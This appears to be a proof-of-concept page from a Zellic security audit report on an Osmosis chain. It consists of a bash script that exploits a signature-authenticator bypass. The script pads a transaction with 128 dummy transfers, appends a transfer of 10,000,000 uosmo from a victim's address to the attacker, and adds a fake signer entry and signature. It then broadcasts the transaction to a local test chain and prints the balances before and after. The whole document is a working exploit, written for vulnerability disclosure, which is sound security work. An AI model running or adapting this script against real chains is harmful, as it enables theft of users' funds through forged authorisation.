Zellic - Audit Reports

Proof of concept for signature authenticator authentication bypass

#!/bin/bash

BINARY="osmosisd"
CHAIN_HOME="~/.osmosisd-local"
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"

HACKER_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker`
VICTIM_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a val`

# generate a payload of 128 msgs
cat << EOF > msgs.json
{
  "body": {
    "messages": [
EOF

for i in {1..128}; do
cat << EOF >> msgs.json
      {
        "@type": "/cosmos.bank.v1beta1.MsgSend",
        "from_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
        "to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
        "amount": [
          {
            "denom": "uosmo",
            "amount": "10"
          }
        ]
      },
EOF
done


# add final message with skipped signature
cat << EOF >> msgs.json
      {
        "@type": "/cosmos.bank.v1beta1.MsgSend",
        "from_address": "osmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj",
        "to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
        "amount": [
          {
            "denom": "uosmo",
            "amount": "10000000"
          }
        ]
      }
EOF

cat << EOF >> msgs.json
    ],
    "memo": "",
    "timeout_height": "0",
    "extension_options": [],
    "non_critical_extension_options": []
  },
  "auth_info": {
    "signer_infos": [],
    "fee": {
      "amount": [
        {
          "denom": "uosmo",
          "amount": "12500"
        }
      ],
      "gas_limit": "5000000",
      "payer": "",
      "granter": ""
    }
  },
  "signatures": []
}
EOF

# sign the payload from the hacker
$BINARY $TX_FLAGS tx sign msgs.json --from=hacker --sign-mode amino-json 2>&1 | jq > signed.json

# add fake signature and signer info
cat signed.json | \
  jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
  "sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
  jq '.signatures[1] |= .+ "AAAA"' > signed2.json

VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances before:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"

# broadcast the payload
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > outout.json

# see the logs for the final message
cat outout.json| jq '.logs[-1]'

VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances after:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"